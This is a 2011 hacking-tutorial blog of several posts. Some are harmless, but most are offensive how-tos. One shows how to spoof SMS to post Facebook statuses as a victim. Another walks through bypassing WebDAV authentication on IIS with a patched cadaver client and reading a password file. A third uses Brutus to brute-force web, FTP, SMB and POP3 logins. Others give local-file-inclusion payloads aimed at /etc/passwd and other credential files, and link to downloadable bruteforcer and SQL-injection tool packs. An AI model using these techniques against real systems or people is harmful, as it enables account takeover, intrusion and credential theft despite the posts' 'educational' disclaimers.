Mar 28, 2011

Facebook Flaw - SMS spoofing

First Let us know what is Sms spoofing ......

SMS spoofing is a relatively new technology which uses the short message service (SMS), available on most mobile phones s, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text.

There are many SMS spoofing sites available in the internet.For this tutorial i am gonna use 


!!SMS GLOBAL!!


just go to the site and register in the site they will send you the password to your mobile .. 


Then login to your account


Send the sms to 9232232665 and type in Victim's moble no. in the "Sender ID From" text box and type in the status in the "Message" Text box

.To make the trick work the victim must have registered the number to facebook otherwise this will not work 


Hope Facebook will patch up this loop hole soon . 


Note - This was post for awareness and education level only I am not responsible what you do with this information 


You Can use any sms spoofing site for this ex - Sneak Sms


Happy hacking

Mar 26, 2011

___The webDAV___

 

webDAV also known as Web-based Distributed Authoring and Versioning is a set of methods based on the Hypertext Transfer Protocol (HTTP) that facilitates collaboration between users in editing and managing documents and files stored on World Wide Web servers.For more info go here

Detection , Vulnerability checking and Exploitation

The first thing one should know about this vulnerability is that the IIS server is not exploitable if the root folder is protected. Also if the root folder is protected, there is no way to determine if WebDAV is even enabled. That being said, if the root folder is= not= protected then it’s time to break out the server and have some fun.

Detecting if WebDAV is enabled

Tested on 


►IIS 6.0/Windows 2003 Enterprise SP2
►IIS 5.1/Windows XP Pro SP2
►IIS 5.0/Windows 2000 SP4

note-On IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry to disable it.

the method of detection simply involves running a PROPFIND request on the server. This is the same basic PROPFIND request we used in the http-iis-webdav-vuln.nse script: 

PROPFIND / HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:">
<prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop>
</propfind>

If webDAV is enabled it will return something like this “HTTP/1.1 207 Multi-Status”

if webDAV has been disabled, it will return “HTTP/1.1 501 Not Supported”

Checking if a server is vulnerable

tested on (working)

► IIS 6.0/Windows 2003 Enterprise SP2
► IIS 5.1/Windows XP Pro SP2

Tested On (not working) 

►IIS 5.0/Windows 2000 SP4

The original script only used one type of check; it would first find a protected folder (/secret/) and then try inserting the % c 0 % a f(widout space) character after the first /. It would turn /secret/ into                   / % c 0  % a f secret/. (widout space)

This works fine on IIS 6.0 but  not work at all on IIS 5.0/5.1.  The trick with 5.1 is that the % c 0 % a f character can not be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0. I modified the script so that it uses the 5.1/6.0 check, turning /secret/ into                         / s % c 0 % a f secret/. 

 Finding a vulnerable server

First thing we need to do is find a vulnerable server Lets see how an nmap scan of abox with the updated script that works 

> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
PORT   STATE SERVICE
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
We found webDAV is enabled and there are 3 vuln folders 

 

Exploiting it...!

Now just telnet the host over port 80.... Some more fun to have we will use a webDAV client cadaver

The nice thing about it is that it’s open,  the cadaver-0.23.2 source and after hacking away at it for awhile,  there is a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details but basically it does the following:

1) Replace any “Depth: 0″ header with “Depth: 1″ (otherwise ls won’t work)
2) Append the header “Translate: f” to every request (otherwise get and probably others won’t work)
3) Insert the characters “%c0%af” into any uri request longer than 1 character.

get the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here’s the commands:
> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
--snip--
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
--snip--
> tar xzvf cadaver-0.23.2.tar.gz
--snip--
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
--snip--
> make
--snip--

 Now we should have a patched, compiled version of cadaver, so start it up with the server that was identified as having a vulnerable folder earlier:

 

> ./cadaver xxx.xxx.xxx.xxx

This should drop you to a “dav:/>” prompt. Now just cd into the vulnerable folder and check out what’s there:

dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/': succeeded.
        password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt':
ron$pr0ns
dav:/secret/>

You got it now :D
Here’s a list of commands  that work with the patched cadaver on a vulnerable folder:

* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE



If you exploited a IIS server let me know ;)

I am not the writer of this tutorial this is only edited by me 

Happy Hacking


 

Btutus - The Brute Forcing Tool



- Intro -

1.What is Brutus?

Brutus is a well known and smart brute forcing tool.It is used by hackers/cr@(kers to brute force login passwords

2.What can you do with it?


We can use it to bruteforce password for HTTP, FTP, POP3, Telnet, SMB (Netbios), Netbus, etc ...


Download from = http://www.multiupload.com/1W36PPEEYN 
password  - hackingclass

Password List - Google It or go here

Understanding Brutus





 Time For some cr@ckin ,,,

==HTTP form==

This is the option you would use if you want to cr@(k into a website that has a field for a username and a pass

First thing you wanna do is open Brutus, and select http form. Then click the modify sequence button. Once there we put
the above link into the Target form field, then click Learn Form Settings
From here, you click the field name that is for the username, in this case it is userid, once you have selected it,
click the username button that is shown above the cookie information. That tells brutus that that field is for the username.
Then you select the password field and click the password button, then click accept. Next, in the HTML Response field you
need to fill that in with the response you get when you try to enter a password into your site. In this case the response is
"You have entered a wrong Password or username." For this target we will put that into the Primary response field Once this
is done, we click ok, add the IP into the Target Field and start our cr@(k.


==FTP== 
For cr@(king an FTP server, the default settings should remain how they are,  make sure that the "Try to stay
connected for unlimited attempts" box is ticked. nce you have selected your options, enter the IP and
being the cr@(k.


==Telnet==
The default Settings will work .. no modifying
 

==Netbus==

http://www.multiupload.com/1W36PPEEYN
Net Bus is a trojan. Sometimes this asks for a username and password to connect to the host.
This option is used for, cr@(king a password protected Netbus server.

==SMB (Netbios)==

If you happen to find yourself a target that has the netbios port open{139)and has sharing enabled, but it needs a password, this option what you would use. default settings should work.
 

==POP3==

Same as FTP ... Same settings will work use the "Try to stay connected for unlimited attempts" option.  


==Custom==

This is what you would use to set up a cr@(k for anything else that you could think You need to find out what you need to put in each field once you click "Define sequence" These options will vary from target to target and victim to victim . 


note - All information here is only for educational purposed. I am not responsible if it is used for illegal work.

Happy Hacking

Mar 19, 2011

Steganography - The Art Of Hiding Secret Message



Steganography is the art and science of writing hidden messages in such a way that no one apart from the sender and the receiver can know it . In simple words you can say it is a art to Hide our data.To know more about this visit This.

What is the difference between encryption and Steganography?


In encryption the attacker may know that two people are communicating with eachother secret way 

If you use stegenography technique no one knows that you are sharing some secret data/information with one another 

In stegenography our secret data is joined with some other data file like some image file or some video file..etc.. so, attacker may not get a single clue that secret information is shared between two person...!!!!!                           
How to Do this ?

The tool we are going to use -Quick Stego

Password- hemalandsauravonly



Steps - 



1- The software will look something like this 


Now The real works begin 


Now click on open and choose your image which we are gonna use for further steps 


Click on open 


You will see something like this


Now the text hiding part 


Make a notepad (txt) File with your secret message in it.

Then click on open text browse to the txt file then click on open .



Now click on the HIDE TEXT button 


 Now just save your image and hoila we have encrypted the text in the photo

now save it

Now Comes the decoding part .

This is very easy ...


Just open the image in the software


And we can see the text here



This is a article by Hemal Modi .. 


I heartily thank him for showing interest in this blog .


Happy hacking

Mar 13, 2011

◄---- Zombie computers ---►




What are zombie computers? 
Lets see if you can get it through this picture...This is only a example diagram to only make you understand....

 
Now let me explain you this in words..

A zombie computer is a system  which is either hacked or compromised by the Hacker without the knowledge of the owner.The computer can be remote operated by the hacker to commit crimes using the compromised computer...The remote user controls the system to perform different malicious tasks like "Illegal Hosting","Click Fraud","Email Fraud and Bombing","Performing DDOS attacks" etc..

A Hacker's Trojan or virus can turn a ordinary computer into a zombie computer.Zombie computers are often a part of a botnet / a zombie network . This network have a collection of many zombie computers (which the hacker have compromised )which are used to commit destructive and dangerous cyber crimes

The harms Explained..

Illegal hosting =  This refers to the illegal hosting of phishing pages or virus on the compromised computer.The hacker uses the compromised computer as a hosting on which he hosts his phishing pages..
  
Click fraud = Click fraud occurs when a person or a  automated script or computer program imitates a legitimate Web user who clicks on an ad. Attackers use zombies to commit click fraud against sites that display pay-per-click advertising.


DDOS attacks = With this attack the attacker attempt make a computer resource unavailable to its owner or user...MAKE IT DOWN.....Explained here



Email Fraud and Bombing = Email spamming is a the most popular crime now days ... the attacker sends a email promising you won a 100000$ to claim it contact +95647512 ... You call the number and then the call receiver tells you to transfer some amount to his account..May be a 1000$ . you transfer it then you are looted he is rich you are poor ...This is the mail fraud  


Bombing means sending huge amount of mails to the email account making it unavailable to access to the right user 


Symptoms of a Zombie Computers 

Many owners of the zombie computers are aware that their precious computer is being used for some destructive crime.Some symptoms of Zombie computers are

  • You cannot access main antivirus and firewall vendor sites.
  • You notice that your computer Will slow down
  • high CPU usage.
  • Your firewall software stops running or may become disable
  • Your anti-virus software will  corrupt
  • Your ScreenSavers will stop working
  • Malfunction in your Computer
====HOW TO BE SAFE====
You can be also smart than the hackers with some knowledge and a working brain

Changing the passwords - If your computer was a victim of the zombie then the trojan or the virus that was in your computer must have been sending all the logs of your computer including your keystrokes..Change all the passwords you have access using the computer like gmail,PayPal,bank account etc..

Getting your self a good antivirus- Buy yourself a good antivirus with features like anti spyware,anti malware....you can use kaspersky,quick heal , nod32 etc

Re update your programs - Update your computer and all the programs you used 

Run the antivirus can daily - Scan your computer daily or once in 2 to 3 days ....

Report the Zombie -If you have discovered a Zombie in your computer immediately contact your ISP and inform them ... they will help you trace back the Hacker


Scan your computer until when you feel you are not secured

Happy Hacking

Mar 8, 2011

Mozilla Firefox - The hacker's choice

The security testers or the hackers have a lot of tool to play around with . But what if Your browser helps you in this ?

The magical browser is Mozilla Firefox and the extensions/add-ons developed by the professional ethical hackers and penetration testers..

In this article i will tell you some of the best add-ons of all time that hacker  uses....

Download Firefox from Google

Now back to topic

Social engineering add-on

People Search and Public Record: This Firefox extension is a very handy tool for investigators,hackers,legal professionals, and anyone interested in doing their own basic people searches and public record look ups as well as background research.

Google and Spider

Advanced dork : Gives quick access to Google’s Advanced Dorks directly from the context menu. This could be used to scan for hidden files or narrow in a target anonymously.

SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack

Editors (WEBMASTER)

JSView : The ’view page source’ menu item now opens files based on the behavior you choose in the jsview options. This allows you to open the source code of any web page in a new tab or in an external editor..

Firebug : Firebug integrates with Firefox to put a wealth of development tools at your hand while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page

XML Developer Toolbar:allows XML Developer’s use of standard tools all from your browser.


Headers manipulation
and agent switcher

HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

RefControl : Control what gets sent as the HTTP Referer on a per-site basis.

User Agent Switcher :Adds a menu and a toolbar button to switch the user agent of the browser

Cookies manipulation/editors 

Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved cookies.

httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side
 Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt file

Security Tools

HackBar : This toolbar will help  in testing sql injections, XSS holes and site security.This tool will not help you to exploit the vulnerability or to learn hacking. Its main purpose is to help a hacker do security audits on his code.

Tamper Data : tamper data to view and modify HTTP/HTTPS headers and post parameters.

Chickenfoot: Chickenfoot is a Firefox extension that puts a programming environment in the browser’s sidebar so you can write scripts to manipulate web pages and automate web browsing

Proxy utilities

POW (Plain Old WebServer) : The Plain Old Webserver uses Server-side Javascriptto run a server inside your browser. Use it to distribute files from your browser. It supports Server-side JS, GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your site. Users have created a wiki, chat room and search engine using SJS.

FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s proxy configuration. It offers more features than SwitchProxy, Proxy Button etc

SwitchProxy: SwitchProxy lets you manage and switch between multiple proxy configurations quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes

miscellaneous 

Hacks for fun 

Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript.scripts could be download at user scripts

Mar 7, 2011

Local File Inclusion ( L F I )


In this article i will explain you the web exploitation technique "Local File Inclusion"....

What make a website Vulnerable to LFI ?

A piece of PHP code makes a website vulnerable to LFI..Lets look at this code

$page = $_GET[page];
include($page);
?>


This code must not be used anywhere in a php script.Because the $page isn’t sanitized and is passed directly to the webpage, but unfortunately This code can be get many times in many popular websites.


Now we know why and how the webpage gets vulnerable.So lets talk for The rest Using the vulnerability for our advantage.

Let us now how this code gives us the ability to browse Thru the WEB SERVER

Now You all imagine that There is a file named saurav.php in the root directory of a website..
If you type 
http://victim.com/root/saurav.php 
You can get the access to that file Right ?

But if the piece of the php code is inside the Index.php then we can run the code using 
http://victim.com/index.php?page=root/saurav.php 

If the index.php was in victim.com/root/index.php and the saurav.php in http://victim.com/saurav.php you will have to type http://victim.com/test/index.php?page=../saurav.php . The ../ is called directory
transversal  that will allow you to go up in the directories.


Now i think you understood this one..lets move on 

Now we can have access to the Directories\files that the server doesn't allow.If it is hosted in a UNIX server then we can have access to the password files of the server..we will have to add ../ to cycle thru the directories..
Example

http://site.com/index.php?page=../../etc/passwd
http://site.com/index.php?page=../../../../../../etc/passwd


This depends on in which directory the the file passwd is present...


If you don't know what to do with the etc/passwd then read the full article...

The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:

username: passwd:UID:GID:full_name:directory:shell

For example:
username:SaurRavhAckingclass:503:100:FullName:/home/user name:/bin/sh

All you need to do then is get the username and decode the password. If the passwd file is shadowed then you’ll see something like this:

username:x:503:100:FullName:/home/username:/bin/sh

Now you can see the password is "x" and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many process, thats why you have access to it.

Here are some places that you can play with 
/etc/passwd
/etc/shadow
/etc/security/user
/etc/security/group
/etc/security/passwd
/etc/security/limits
/etc/security/environ
/etc/group
THis site will help you more on this etc/passwd

click here

There is another piece of code that may result in making a site vulnerable to LFI

$page = $_GET["page"];
include(“$page.php”);
?>
 

In this case as you can see it will add .php to anything you include..So if you type
http://victim.com/index.php?page=../../../../etc/passwd

and it will show some error like the file does not exists you will have to apply a null byte ()

http://victim.com/index.php?page=../../../../etc/passwd

This null byte will ignore the everything after
There are many other ways to exploit a website using LFI...We can use perl scripts and many other things are there... i will discuss them someday other...

This article is going to be little difficult for a beginner..Read this thoroughly and search google for this

Happy Hacking 


Credits - planet creator

Mar 3, 2011

WebSecurify-Web Penetration testing tool


If you own  a website you also have to look after it's security to check if your website is vulnerable to some of the famous flaws like SQLI and XSS .. Even script kiddies or a noob can Hack your websites if it is vulnerable to these flaws using some kiddie tool..That is not a big deal for them

You can check the if the Your website is vulnerable manually ... But it is a waste of time for you all guyz..This tool will help you in doing so without wasting your time


WHAT IT CHECKS ?

This tool checks some of the popular flaws of web like...

  • SQL Injection
  • Local and Remote File Include
  • Cross-site Scripting
  • Cross-site Request Forgery
  • Information Disclosure Problems
  • Session Security Problems
  • And many other that are in OWASP TOP 10
Available Features
  • Available for all main operating systems (Windows, Mac OS, Linux)
  • Simple to use user interface(GUI)
  • Built-in internationalization support
  • Easily extensible with the help of add-ons and plugins
  • Exportable and customizable reports with any level of detail
  • Moduler and reusable design
  • Powerful manual testing tools and helper facilities
  • Powerful analytical and scanning technology
  • Scriptable support for JavaScript and Python 
 Official Video


Download From -
Windows - http://websecurify.googlecode.com/files/Websecurify%200.8.exe
Linux-http://websecurify.googlecode.com/files/Websecurify%200.8.tgz
Mac-http://websecurify.googlecode.com/files/Websecurify%200.8.dmg

Official Website

Mar 2, 2011

Reiluke Tool Collection

Hello!all..How are You?...I got this tools Collection today.It is really a awesome Collection of tools made by Reiluke..

This pack contains Some of the hottest tools...
1-Admin Page Finder

2-Blind Sql injector

3-Cpanel Bruteforcer

4-Duplicate File Remover

5-Email Bruteforcer(Yahoo\Gmail/Hotmail)

6-Email Checker

7-RapidShare Checker

8-sqli helper (Sqli injection tool)

 I will give it's tutorial some day...
9-Exploit Scanner

10-Sqli Column counter


Download Link - CLICK HERE..
password - saurav

Happy hacking

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More